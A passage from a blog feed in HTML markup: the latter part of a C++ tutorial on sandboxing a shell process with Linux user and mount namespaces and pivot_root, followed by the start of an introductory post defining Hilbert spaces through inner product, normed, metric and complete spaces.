class="o">&lt;</span><span class="kt">int</span><span class="p">,</span> <span class="kt">int</span><span class="o">&gt;</span> <span class="n">uid_map</span> <span class="o">=</span> <span class="p">{</span> <span class="p">{</span> <span class="mi">0</span><span class="p">,</span> <span class="n">getuid</span><span class="p">(),</span> <span class="p">}</span> <span class="p">};</span> <span class="k">return</span> <span class="n">uid_map</span><span class="p">;</span> <span class="p">}</span></code></pre></figure> <p>Then we write to the file corresponding to a given pid:</p> <figure class="highlight"><pre><code class="language-cpp" data-lang="cpp"><span class="kt">int</span> <span class="nf">set_uid_map</span><span class="p">(</span><span class="n">map</span><span class="o">&lt;</span><span class="kt">int</span><span class="p">,</span> <span class="kt">int</span><span class="o">&gt;</span> <span class="n">uid_map</span><span class="p">,</span> <span class="kt">int</span> <span class="n">pid</span><span class="p">)</span> <span class="p">{</span> <span class="n">string</span> <span class="n">uid_map_filename</span> <span class="o">=</span> <span class="n">format</span><span class="p">(</span><span class="s">"/proc/%d/uid_map"</span><span class="p">,</span> <span class="n">pid</span><span class="p">);</span> <span class="n">ofstream</span> <span class="n">fs</span><span class="p">;</span> <span class="n">fs</span><span class="p">.</span><span class="n">open</span><span class="p">(</span><span class="n">uid_map_filename</span><span class="p">.</span><span class="n">c_str</span><span class="p">());</span> <span class="k">if</span> <span class="p">(</span><span class="n">fs</span><span class="p">.</span><span class="n">fail</span><span class="p">())</span> <span class="p">{</span> <span class="n">fatal_action</span><span class="p">(</span><span class="s">"opening uid_map file"</span><span class="p">);</span> <span class="k">return</span> <span 
class="mi">1</span><span class="p">;</span> <span class="p">}</span> <span class="k">for</span> <span class="p">(</span><span class="k">auto</span> <span class="k">const</span><span class="o">&amp;</span> <span class="p">[</span><span class="n">in_id</span><span class="p">,</span> <span class="n">out_id</span><span class="p">]</span><span class="o">:</span> <span class="n">uid_map</span><span class="p">)</span> <span class="p">{</span> <span class="n">fs</span> <span class="o">&lt;&lt;</span> <span class="n">in_id</span> <span class="o">&lt;&lt;</span> <span class="s">" "</span> <span class="o">&lt;&lt;</span> <span class="n">out_id</span> <span class="o">&lt;&lt;</span> <span class="s">" "</span> <span class="o">&lt;&lt;</span> <span class="mi">1</span> <span class="o">&lt;&lt;</span> <span class="n">endl</span><span class="p">;</span> <span class="p">}</span> <span class="n">fs</span><span class="p">.</span><span class="n">close</span><span class="p">();</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span></code></pre></figure> <p>The tricky part is that the child process does not have privileges to write to its own <code class="language-plaintext highlighter-rouge">uid_map</code> file, so it’s the parent that has to do it. Let’s assume we have a function <code class="language-plaintext highlighter-rouge">before_child_runs()</code> that takes the child <code class="language-plaintext highlighter-rouge">pid</code> and as the name suggests runs before the child. 
This is where we set the uid map:</p> <figure class="highlight"><pre><code class="language-cpp" data-lang="cpp"><span class="kt">int</span> <span class="nf">before_child_runs</span><span class="p">(</span><span class="kt">int</span> <span class="n">pid</span><span class="p">)</span> <span class="p">{</span> <span class="k">auto</span> <span class="n">uid_map</span> <span class="o">=</span> <span class="n">get_uid_map</span><span class="p">();</span> <span class="n">set_uid_map</span><span class="p">(</span><span class="n">uid_map</span><span class="p">,</span> <span class="n">pid</span><span class="p">);</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span></code></pre></figure> <p>To guarantee the right order of execution, we’ll need more synchronization.</p> <h2 id="synchonization-ii">Synchronization II</h2> <p>We’ll use pipes for this. A pipe <code class="language-plaintext highlighter-rouge">pipe_fd</code> contains two file descriptors: <code class="language-plaintext highlighter-rouge">pipe_fd[0]</code> is the <em>read</em> end of the pipe, and <code class="language-plaintext highlighter-rouge">pipe_fd[1]</code> is the <em>write</em> end.</p> <p>When we clone a process the child inherits a copy of the open file descriptors, so pipes can be used as an IPC (inter-process communication) medium. 
We can also use it as a synchronization mechanism, because the <code class="language-plaintext highlighter-rouge">read()</code> function blocks until data is available or the other side closes the file descriptor.</p> <figure class="highlight"><pre><code class="language-cpp" data-lang="cpp"><span class="k">struct</span> <span class="nc">NamespaceProcess</span> <span class="p">{</span> <span class="nl">private:</span> <span class="kt">int</span> <span class="n">pipe_fd</span><span class="p">[</span><span class="mi">2</span><span class="p">];</span> <span class="c1">// ...</span> <span class="kt">int</span> <span class="n">child_function_wrapper</span><span class="p">()</span> <span class="p">{</span> <span class="c1">// won't use</span> <span class="n">close</span><span class="p">(</span><span class="n">pipe_fd</span><span class="p">[</span><span class="mi">1</span><span class="p">]);</span> <span class="c1">// Block on parent - request a non-zero number of chars</span> <span class="kt">char</span> <span class="n">ch</span><span class="p">;</span> <span class="k">if</span> <span class="p">(</span><span class="n">read</span><span class="p">(</span><span class="n">pipe_fd</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="o">&amp;</span><span class="n">ch</span><span class="p">,</span> <span class="mi">1</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> <span class="n">cerr</span> <span class="o">&lt;&lt;</span> <span class="s">"Failure in child: read from pipe returned != 0"</span> <span class="o">&lt;&lt;</span> <span class="n">endl</span><span class="p">;</span> <span class="p">}</span> <span class="n">close</span><span class="p">(</span><span class="n">pipe_fd</span><span class="p">[</span><span class="mi">0</span><span class="p">]);</span> <span class="c1">// ...</span> <span class="p">}</span> <span
class="kt">int</span> <span class="n">run</span><span class="p">()</span> <span class="p">{</span> <span class="k">if</span> <span class="p">(</span><span class="n">pipe</span><span class="p">(</span><span class="n">pipe_fd</span><span class="p">)</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="n">fatal_action</span><span class="p">(</span><span class="s">"open pipe"</span><span class="p">);</span> <span class="p">}</span> <span class="kt">int</span> <span class="n">clone_flags</span> <span class="o">=</span> <span class="n">get_custom_clone_flags</span><span class="p">()</span> <span class="o">|</span> <span class="n">SIGCHLD</span><span class="p">;</span> <span class="kt">int</span> <span class="n">pid</span> <span class="o">=</span> <span class="n">create_child</span><span class="p">(</span><span class="n">clone_flags</span><span class="p">);</span> <span class="c1">// won't use, but has to be closed after the child</span> <span class="c1">// was created</span> <span class="n">close</span><span class="p">(</span><span class="n">pipe_fd</span><span class="p">[</span><span class="mi">0</span><span class="p">]);</span> <span class="n">before_child_runs</span><span class="p">(</span><span class="n">pid</span><span class="p">);</span> <span class="c1">// Unblocks child</span> <span class="n">close</span><span class="p">(</span><span class="n">pipe_fd</span><span class="p">[</span><span class="mi">1</span><span class="p">]);</span> <span class="c1">// ...</span> <span class="p">}</span></code></pre></figure> <p>Now we can check the user is correct:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">^_^: <span class="nb">whoami </span>kunigami ^_^: <span class="nb">id </span><span class="nv">uid</span><span class="o">=</span>0 <span class="nv">gid</span><span class="o">=</span>65534 <span class="nb">groups</span><span 
class="o">=</span>65534</code></pre></figure> <p>Note that we have to do the same for the group id, which is a very similar process, but we’ll skip it for the sake of simplicity.</p> <h2 id="mount-isolation">Mount Isolation</h2> <p>Let’s also create a mount namespace by adding the <code class="language-plaintext highlighter-rouge">CLONE_NEWNS</code> flag.</p> <figure class="highlight"><pre><code class="language-cpp" data-lang="cpp"><span class="c1">// sub_process.cpp</span> <span class="k">struct</span> <span class="nc">NamespaceProcess</span> <span class="p">{</span> <span class="c1">// ...</span> <span class="kt">int</span> <span class="n">run</span><span class="p">()</span> <span class="p">{</span> <span class="kt">int</span> <span class="n">clone_flags</span> <span class="o">=</span> <span class="n">SIGCHLD</span> <span class="o">|</span> <span class="n">CLONE_NEWUSER</span> <span class="o">|</span> <span class="n">CLONE_NEWNS</span><span class="p">;</span> <span class="kt">int</span> <span class="n">pid</span> <span class="o">=</span> <span class="n">create_child</span><span class="p">(</span><span class="n">clone_flags</span><span class="p">);</span> <span class="c1">// ...</span> <span class="p">}</span> <span class="p">}</span></code></pre></figure> <p>Unlike the user namespace, which starts out empty, the mount namespace starts with a copy of the host’s mount system, but we want to restrict that. We’ll define a new root for our filesystem and mount only a select few paths on it, using <code class="language-plaintext highlighter-rouge">pivot_root()</code>.</p> <p>This is the most complicated part of the code, so let’s go over the high-level steps.</p> <ul> <li>Make the current root (<code class="language-plaintext highlighter-rouge">/</code>) a private mount point (it’s shared by default). This <a href="https://lwn.net/Articles/689856/">article</a> goes over the different types of mount points.
From :</li> </ul> <blockquote> <p>These restrictions ensure that <code class="language-plaintext highlighter-rouge">pivot_root()</code> never propagates any changes to another mount namespace.</p> </blockquote> <ul> <li>Make sure the new root is a mount point. From :</li> </ul> <blockquote> <p><code class="language-plaintext highlighter-rouge">new_root</code> must be a path to a mount point, but can’t be “/”. A path that is not already a mount point can be converted into one by bind mounting the path onto itself</p> </blockquote> <ul> <li>Mount a selection of paths <code class="language-plaintext highlighter-rouge">P</code> (provided by the child class) onto the new root</li> <li>Create a temporary directory <code class="language-plaintext highlighter-rouge">put_old</code> (under the new root), where the old root will be temporarily stored. From :</li> </ul> <blockquote> <p><code class="language-plaintext highlighter-rouge">put_old</code> must be at or underneath <code class="language-plaintext highlighter-rouge">new_root</code></p> </blockquote> <ul> <li>Pivot root - This makes <code class="language-plaintext highlighter-rouge">new_root</code> the new root and it mounts the old root onto <code class="language-plaintext highlighter-rouge">put_old</code></li> <li>Re-mount the paths <code class="language-plaintext highlighter-rouge">P</code> - It seems that <code class="language-plaintext highlighter-rouge">pivot_root()</code> unmounts prior mounts so we have to remount. 
I don’t actually understand why we need to mount twice, but it only works if I do this, and this is also what <a href="https://github.com/google/nsjail">nsjail</a> does .</li> <li>Unmount the old root</li> </ul> <p>Most of these steps are described as an example in the man page of <a href="https://man7.org/linux/man-pages/man2/pivot_root.2.html"><code class="language-plaintext highlighter-rouge">pivot_root()</code></a> .</p> <p>In code it will look like:</p> <figure class="highlight"><pre><code class="language-cpp" data-lang="cpp"><span class="c1">// sub_process.cpp</span> <span class="kt">int</span> <span class="nf">mount_onto_new_root</span><span class="p">(</span><span class="n">string</span> <span class="n">path</span><span class="p">)</span> <span class="p">{</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">flags</span> <span class="o">=</span> <span class="n">MS_BIND</span> <span class="o">|</span> <span class="n">MS_REC</span> <span class="o">|</span> <span class="n">MS_PRIVATE</span><span class="p">;</span> <span class="n">string</span> <span class="n">dstpath</span> <span class="o">=</span> <span class="n">format</span><span class="p">(</span><span class="s">"%s%s"</span><span class="p">,</span> <span class="n">NEW_ROOT_DIR</span><span class="p">,</span> <span class="n">path</span><span class="p">.</span><span class="n">c_str</span><span class="p">());</span> <span class="n">create_dir_recursively</span><span class="p">(</span><span class="n">dstpath</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span><span class="n">mount</span><span class="p">(</span><span class="n">path</span><span class="p">.</span><span class="n">c_str</span><span class="p">(),</span> <span class="n">dstpath</span><span class="p">.</span><span class="n">c_str</span><span class="p">(),</span> <span class="s">"proc"</span><span class="p">,</span> <span class="n">flags</span><span class="p">,</span> <span 
class="s">""</span><span class="p">)</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="n">fatal_action</span><span class="p">(</span><span class="s">"mounting directory"</span><span class="p">);</span> <span class="p">}</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> <span class="kt">int</span> <span class="nf">remount</span><span class="p">(</span><span class="n">string</span> <span class="n">path</span><span class="p">)</span> <span class="p">{</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">flags</span> <span class="o">=</span> <span class="n">MS_RDONLY</span> <span class="o">|</span> <span class="n">MS_REMOUNT</span> <span class="o">|</span> <span class="n">MS_BIND</span><span class="p">;</span> <span class="k">if</span> <span class="p">(</span><span class="n">mount</span><span class="p">(</span><span class="n">path</span><span class="p">.</span><span class="n">c_str</span><span class="p">(),</span> <span class="n">path</span><span class="p">.</span><span class="n">c_str</span><span class="p">(),</span> <span class="nb">NULL</span><span class="p">,</span> <span class="n">flags</span><span class="p">,</span> <span class="s">""</span><span class="p">)</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="n">fatal_action</span><span class="p">(</span><span class="s">"remounting directory"</span><span class="p">);</span> <span class="p">}</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> <span class="k">struct</span> <span class="nc">NamespaceProcess</span> <span class="p">{</span> <span class="c1">// ...</span> <span class="k">virtual</span> <span class="n">vector</span><span class="o">&lt;</span><span 
class="n">string</span><span class="o">&gt;</span> <span class="n">get_mount_paths</span><span class="p">()</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="kt">int</span> <span class="n">new_root</span><span class="p">()</span> <span class="p">{</span> <span class="c1">// Create a directory if it doesn't exist</span> <span class="n">mkdir</span><span class="p">(</span><span class="n">NEW_ROOT_DIR</span><span class="p">,</span> <span class="mo">0777</span><span class="p">);</span> <span class="c1">// For pivot_root to work the root of the current file tree</span> <span class="c1">// must not have shared propagation</span> <span class="k">if</span> <span class="p">(</span><span class="n">mount</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span> <span class="s">"/"</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="n">MS_REC</span> <span class="o">|</span> <span class="n">MS_PRIVATE</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">)</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="n">fatal_action</span><span class="p">(</span><span class="s">"executing mount() on /"</span><span class="p">);</span> <span class="p">}</span> <span class="c1">// Ensure that 'new_root' is a mount point</span> <span class="k">if</span> <span class="p">(</span><span class="n">mount</span><span class="p">(</span><span class="n">NEW_ROOT_DIR</span><span class="p">,</span> <span class="n">NEW_ROOT_DIR</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="n">MS_BIND</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">)</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="n">fatal_action</span><span 
class="p">(</span><span class="s">"executing mount() on new root"</span><span class="p">);</span> <span class="p">}</span> <span class="n">vector</span><span class="o">&lt;</span><span class="n">string</span><span class="o">&gt;</span> <span class="n">paths</span> <span class="o">=</span> <span class="n">get_mount_paths</span><span class="p">();</span> <span class="c1">// Mount paths</span> <span class="k">for</span><span class="p">(</span><span class="k">auto</span> <span class="n">srcpath</span><span class="o">:</span><span class="n">paths</span><span class="p">)</span> <span class="p">{</span> <span class="n">mount_onto_new_root</span><span class="p">(</span><span class="n">srcpath</span><span class="p">);</span> <span class="p">}</span> <span class="c1">// Create temporary directory to store the old root</span> <span class="n">string</span> <span class="n">old_root_dir</span> <span class="o">=</span> <span class="n">format</span><span class="p">(</span><span class="s">"%s%s"</span><span class="p">,</span> <span class="n">NEW_ROOT_DIR</span><span class="p">,</span> <span class="n">PUT_DIR</span><span class="p">);</span> <span class="n">mkdir</span><span class="p">(</span><span class="n">old_root_dir</span><span class="p">.</span><span class="n">c_str</span><span class="p">(),</span> <span class="mo">0777</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span><span class="n">pivot_root</span><span class="p">(</span><span class="n">NEW_ROOT_DIR</span><span class="p">,</span> <span class="n">old_root_dir</span><span class="p">.</span><span class="n">c_str</span><span class="p">())</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="n">fatal_action</span><span class="p">(</span><span class="s">"executing pivot_root()"</span><span class="p">);</span> <span class="p">}</span> <span class="k">if</span> <span class="p">(</span><span 
class="n">chdir</span><span class="p">(</span><span class="s">"/"</span><span class="p">)</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="n">fatal_action</span><span class="p">(</span><span class="s">"moving to new root"</span><span class="p">);</span> <span class="p">}</span> <span class="c1">// Remount paths</span> <span class="k">for</span><span class="p">(</span><span class="k">auto</span> <span class="n">srcpath</span><span class="o">:</span><span class="n">paths</span><span class="p">)</span> <span class="p">{</span> <span class="n">remount</span><span class="p">(</span><span class="n">srcpath</span><span class="p">);</span> <span class="p">}</span> <span class="kt">int</span> <span class="n">ret</span><span class="p">;</span> <span class="k">if</span> <span class="p">((</span><span class="n">ret</span> <span class="o">=</span> <span class="n">umount2</span><span class="p">(</span><span class="n">PUT_DIR</span><span class="p">,</span> <span class="n">MNT_DETACH</span><span class="p">))</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="n">error_action</span><span class="p">(</span><span class="n">format</span><span class="p">(</span><span class="s">"Failed unmounting"</span><span class="p">));</span> <span class="p">}</span> <span class="k">if</span> <span class="p">(</span><span class="n">ret</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> <span class="n">cerr</span> <span class="o">&lt;&lt;</span> <span class="s">"Failed creating new root"</span> <span class="o">&lt;&lt;</span> <span class="n">endl</span><span class="p">;</span> <span class="n">exit</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">);</span> <span class="p">}</span> <span class="k">return</span> <span 
class="mi">0</span><span class="p">;</span> <span class="p">}</span> <span class="c1">// ...</span> <span class="p">}</span></code></pre></figure> <p>We need to make sure this function is run before <code class="language-plaintext highlighter-rouge">child_function()</code> so we can do:</p> <figure class="highlight"><pre><code class="language-cpp" data-lang="cpp"><span class="c1">// sub_process.cpp</span> <span class="k">struct</span> <span class="nc">NamespaceProcess</span> <span class="p">{</span> <span class="c1">// ...</span> <span class="kt">int</span> <span class="n">child_function_wrapper</span><span class="p">()</span> <span class="p">{</span> <span class="n">new_root</span><span class="p">();</span> <span class="n">child_function</span><span class="p">();</span> <span class="p">}</span> <span class="p">}</span></code></pre></figure> <p><strong>Warning:</strong> Make sure <code class="language-plaintext highlighter-rouge">new_root()</code> is run by the child process and that the mount namespace is used! If you get permission denied and have to use <code class="language-plaintext highlighter-rouge">sudo</code> you’re doing it wrong! 
(Speaking from experience &gt;.&lt;)</p> <p>The child just needs to provide some paths that it would like to mount (read-only):</p> <figure class="highlight"><pre><code class="language-cpp" data-lang="cpp"><span class="c1">// main.cpp</span> <span class="k">class</span> <span class="nc">ShellProcess</span> <span class="o">:</span> <span class="k">public</span> <span class="n">NamespaceProcess</span> <span class="p">{</span> <span class="n">vector</span><span class="o">&lt;</span><span class="n">string</span><span class="o">&gt;</span> <span class="n">get_mount_paths</span><span class="p">()</span> <span class="p">{</span> <span class="n">vector</span><span class="o">&lt;</span><span class="n">string</span><span class="o">&gt;</span> <span class="n">paths</span> <span class="o">=</span> <span class="p">{</span> <span class="s">"/usr/bin"</span><span class="p">,</span> <span class="s">"/usr/sbin"</span><span class="p">,</span> <span class="s">"/bin"</span><span class="p">,</span> <span class="s">"/usr/lib"</span><span class="p">,</span> <span class="s">"/lib"</span><span class="p">,</span> <span class="s">"/lib32"</span><span class="p">,</span> <span class="s">"/lib64"</span><span class="p">,</span> <span class="s">"/libx32"</span> <span class="p">};</span> <span class="k">return</span> <span class="n">paths</span><span class="p">;</span> <span class="p">}</span> <span class="p">}</span></code></pre></figure> <p>We should now have a minimal jailed system up and running!</p> <figure class="highlight"><pre><code class="language-text" data-lang="text">^_^: ls bin home lib lib32 lib64 libx32 old_root proc tmp usr</code></pre></figure> <h2 id="code">Code</h2> <p>The full example is available on <a href="https://github.com/kunigami/kunigami.github.io/blob/master/blog/code/2021-07-02-namespace-jail/main.cpp">Github</a>.</p> <h2 id="conclusion">Conclusion</h2> <p>In this post we went through all the details of creating a shell process with user and mount namespaces. 
Once we unmount the old root after <code class="language-plaintext highlighter-rouge">pivot_root</code>, the old root does not stay around (even hidden) like it does via chroot .</p> <p>The process of starting with everything disabled and painfully adding capabilities is a great way to understand how things are implemented behind the scenes, for example the <code class="language-plaintext highlighter-rouge">/proc/&lt;pid&gt;/uid_map</code>.</p> <p>Ed King’s series  on Linux namespaces using Go is very instructive; it uses a higher-level API, which makes it easier to follow. The man pages from man7.org are very helpful, especially the examples!</p> <p>I’d like to sandbox the network as well, but will leave it to a future post.</p> <h2 id="references">References</h2> <ul> <li>[<a href="https://en.wikipedia.org/wiki/Linux_namespaces">1</a>] Wikipedia - Linux Namespaces</li> <li>[<a href="https://man7.org/linux/man-pages/man2/clone.2.html">2</a>] clone(2) — Linux manual page</li> <li>[<a href="https://medium.com/@teddyking/linux-namespaces-850489d3ccf">3</a>] Linux Namespaces - Ed King</li> <li>[<a href="https://man7.org/linux/man-pages/man7/user_namespaces.7.html">4</a>] user_namespaces(7) — Linux manual page</li> <li>[<a href="https://lwn.net/Articles/689856">5</a>] LWN.net: Mount namespaces and shared subtrees</li> <li>[<a href="https://man7.org/linux/man-pages/man2/pivot_root.2.html">6</a>] pivot_root(2) — Linux manual page</li> <li>[<a href="https://github.com/google/nsjail">7</a>] Github: google/nsjail</li> <li>[<a href="https://news.ycombinator.com/item?id=23167383">8</a>] Hacker News: comment on <em>Linux containers in a few lines of code</em></li> </ul>Guilherme KunigamiIn a previous post we investigated a jail system using chroot with the conclusion that it was not a safe implementation. In this post we’ll study a safer alternative using Linux namespaces.
We’ll develop a C++ application along the way.Hilbert Spaces2021-06-26T00:00:00+00:002021-06-26T00:00:00+00:00https://www.kuniga.me/blog/2021/06/26/hilbert-spaces<!-- This needs to be defined as included html because variables are not inherited by Jekyll pages --> <p>In this post we’ll study the Hilbert space, a special type of vector space that is often used as a tool in the study of partial differential equations, quantum mechanics and Fourier analysis .</p> <!--more--> <p>We’ll first define a Hilbert space from the ground up, starting from basic linear algebra building blocks, and then study some examples.</p> <h2 id="the-hilbert-vector-space">The Hilbert Vector Space</h2> <h3 id="closedness">Closedness</h3> <p>When we say a set $S$ is <strong>closed</strong> under some operation, it means that the result of that operation also belongs to $S$.</p> <p>For example, the set of natural numbers $\mathbb{N}$ is closed under addition, since the sum of two natural numbers is also natural. On the other hand, it’s not closed under subtraction, since the result might be a negative number.</p> <h3 id="vector-space">Vector Space</h3> <p>Let $V$ be a set of vectors and $F$ a set of scalars.
They define a <strong>vector space</strong> if $V$ is closed under addition and scalar multiplication by elements in $F$, which is known as a scalar field or simply <strong>field</strong> and is usually $\mathbb{R}$ or $\mathbb{C}$.</p> <p>By this we mean that if $\vec{x}, \vec{y} \in V$, then $\vec{x} + \vec{y} \in V$, and that if $\vec{x} \in V, \alpha \in F$, then $\alpha \vec{x} \in V$.</p> <p>One example of a vector space is $V = \mathbb{R}^3$ and $F = \mathbb{R}$.</p> <h3 id="inner-product-space">Inner Product Space</h3> <p>The <strong>inner product</strong> is a function from two vectors to a scalar, denoted by $\langle \vec{x}, \vec{y} \rangle$, which must satisfy the following properties:</p> <p>Let $\vec{x}, \vec{y}, \vec{z} \in V$ be vectors and $\alpha \in F$.</p> <p><em>Linearity of the first argument:</em></p> <ul> <li>$\langle \alpha \vec{x}, \vec{y} \rangle = \alpha \langle \vec{x}, \vec{y} \rangle$</li> <li>$\langle \vec{x} + \vec{y}, \vec{z} \rangle = \langle \vec{x}, \vec{z} \rangle + \langle \vec{y}, \vec{z} \rangle$</li> </ul> <p><em>Conjugate symmetry:</em></p> <ul> <li>$\langle \vec{x}, \vec{y} \rangle = \overline{\langle \vec{y}, \vec{x} \rangle}$</li> </ul> <p><em>Positive definiteness:</em></p> <ul> <li>$\langle \vec{x}, \vec{x} \rangle &gt; 0 \mbox{ if } \vec{x} \neq 0$</li> </ul> <p>If our vector space is also equipped with such an inner product, it’s called an <strong>inner product space</strong>.</p> <p>One example of an inner product space is the <em>Euclidean vector space</em>, where $V = \mathbb{R}^n$, $F = \mathbb{R}$ and the inner product is the dot product,</p> $\langle \vec{x}, \vec{y} \rangle = \vec{x} \cdot \vec{y} = \sum_{i=1}^n x_i y_i$ <p>We can also define it for complex vector spaces, $V = \mathbb{C}^n$, $F = \mathbb{C}$, with inner product defined as</p> $\langle \vec{x}, \vec{y} \rangle = \sum_{i=1}^n x_i \bar{y_i}$ <p>where $\bar{y_i}$ is the complex conjugate of $y_i$. Note that the conjugate goes on the second argument so that the inner product stays linear in the first one.</p> <h3 id="normed-space">Normed Space</h3> <p>A normed space is defined over a
set of vectors $V$ and a <strong>norm</strong> operator denoted by $\norm{\vec{x}}$, which can be interpreted as the <em>length</em> of a vector. The norm must satisfy:</p> <p><em>Positive definiteness:</em></p> <ul> <li>$\norm{\vec{x}} \ge 0$, with $\norm{\vec{x}} = 0 \mbox{ iff } \vec{x} = 0$</li> </ul> <p><em>Positive homogeneity:</em></p> <ul> <li>$\norm{\alpha \vec{x}} = \abs{\alpha} \norm{\vec{x}}$</li> </ul> <p><em>Subadditivity (Triangle inequality):</em></p> <ul> <li>$\norm{\vec{x} + \vec{y}} \le \norm{\vec{x}} + \norm{\vec{y}}$</li> </ul> <p>We can show that every inner product space is a normed space. The inner product can be used to define a norm for a vector:</p> $(1) \qquad \norm{\vec{x}} = \sqrt{\langle \vec{x}, \vec{x} \rangle}$ <h3 id="metric-space">Metric Space</h3> <p>A metric space is defined over a set of vectors $V$ and a <strong>metric</strong>, a function that can be interpreted as the distance between two vectors, denoted by $d(\vec{x}, \vec{y})$ and satisfying:</p> <p><em>Positive definiteness:</em></p> <ul> <li>$d(\vec{x}, \vec{y}) \ge 0$, with $d(\vec{x}, \vec{y}) = 0 \iff \vec{x} = \vec{y}$</li> </ul> <p><em>Symmetry:</em></p> <ul> <li>$d(\vec{x}, \vec{y}) = d(\vec{y}, \vec{x})$</li> </ul> <p><em>Subadditivity (Triangle inequality):</em></p> <ul> <li>$d(\vec{x}, \vec{z}) \le d(\vec{x}, \vec{y}) + d(\vec{y}, \vec{z})$</li> </ul> <p>We can show that every normed space is a metric space, since we can define the metric from the norm as:</p> $d(\vec{x}, \vec{y}) = \norm{\vec{x} - \vec{y}}$ <p>Let’s now take a quick detour from vector spaces to cover Cauchy sequences and convergence.
They’re an important concept used to define completeness, which we’ll see later.</p> <h3 id="convergent-sequences">Convergent Sequences</h3> <p>A sequence $x_1, x_2, x_3, \cdots$ <strong>converges</strong> to a <strong>limit</strong> $L$ if for any value $\varepsilon &gt; 0$, there exists $N$ such that for every $n \ge N$,</p> $|x_n - L| &lt; \varepsilon$ <p>A sequence is <strong>convergent</strong> if it has a finite limit $L$.</p> <h3 id="cauchy-sequences">Cauchy Sequences</h3> <p>A sequence $x_1, x_2, x_3, \cdots$ is a <strong>Cauchy sequence</strong> if for any value $\varepsilon &gt; 0$, there exists $N$ such that for every $n, m \ge N$,</p> $\abs{x_n - x_m} &lt; \varepsilon$ <p>Let’s consider the sequence $\sqrt{n}$ for $n = 1, 2, \cdots$. Since consecutive values of $\sqrt{n}$ get closer and closer to each other as $n$ grows, for any $\varepsilon$ we can find $n$ such that $\abs{\sqrt{n + 1} - \sqrt{n}} &lt; \varepsilon$. However, this has to hold for all indices above some $N$, and since $\sqrt{n}$ is unbounded, the difference $\abs{\sqrt{n} - \sqrt{m}}$ for $n, m \ge N$ can be arbitrarily large, so this is <em>not</em> a Cauchy sequence.</p> <p>One example of a Cauchy sequence is the sequence defined by $\frac{1}{n}$ for $n = 1, 2, \cdots$. Given some $\varepsilon$, we can find $N$ such that $\frac{1}{N} &lt; \varepsilon$. This means that for $n, m \ge N$, $\frac{1}{n} &lt; \varepsilon$ and $\frac{1}{m} &lt; \varepsilon$, so their absolute difference also has to be bounded by $\varepsilon$.</p> <p><strong>Limit of a Cauchy sequence.</strong> Since we can choose an arbitrarily small value for $\varepsilon$, we can consider it tending to 0. Informally,</p> $\lim_{\varepsilon \rightarrow 0} x_n = x_m = L \qquad \forall n, m \ge N$ <p>Which means that, in $\mathbb{R}$, all Cauchy sequences are <em>convergent</em>.</p> <h3 id="complete-metric-space">Complete Metric Space</h3> <p>We can adapt the definition of Cauchy sequences for a metric space $(V, d)$.
A sequence is formed by elements from $V$, that is, $x_n$ for $n = 1, 2, \cdots$ with $x_n \in V$. Such a sequence is Cauchy if for any $\varepsilon &gt; 0$ there is $N$ such that $d(x_n, x_m) &lt; \varepsilon$ for $n, m \ge N$.</p> <p>Let $M$ be the limit of a given Cauchy sequence $S$ in $(V, d)$. If for any $S$ the limit $M \in V$, then we say this metric space is complete. It’s worth noting that even though the result of $d$ is in $\mathbb{R}$, the limit of a sequence has a similar “shape” as the elements in $S$.</p> <p>One example of a complete metric space is $V = \mathbb{R}$ with metric as the modulus operation, and so is $V = \mathbb{R}^n$ with $d$ as the Euclidean distance.</p> <p>One example that is <em>not</em> a complete metric space is $V = \mathbb{Q}$, the set of rationals, with metric as the modulus operation. To show that, we just need to find one Cauchy sequence that provides a counter-example. One such sequence is $x_1 = 1$ and $x_{n+1} = \frac{x_n}{2} + \frac{1}{x_n}$. We can show this is a Cauchy sequence and then find the limit by setting $x_{n+1} = x_n$, which yields $\sqrt{2}$, an irrational number and hence not in $V$.</p> <h3 id="hilbert-space">Hilbert space</h3> <p>Having gone through a bunch of different vector spaces, we are ready to define the <strong>Hilbert space</strong>, which is essentially an <em>inner product space</em> and a <em>complete metric space</em>.</p> <p>A very similar space is the <strong>Banach space</strong>, which is a <em>normed space</em> and a <em>complete metric space</em>.
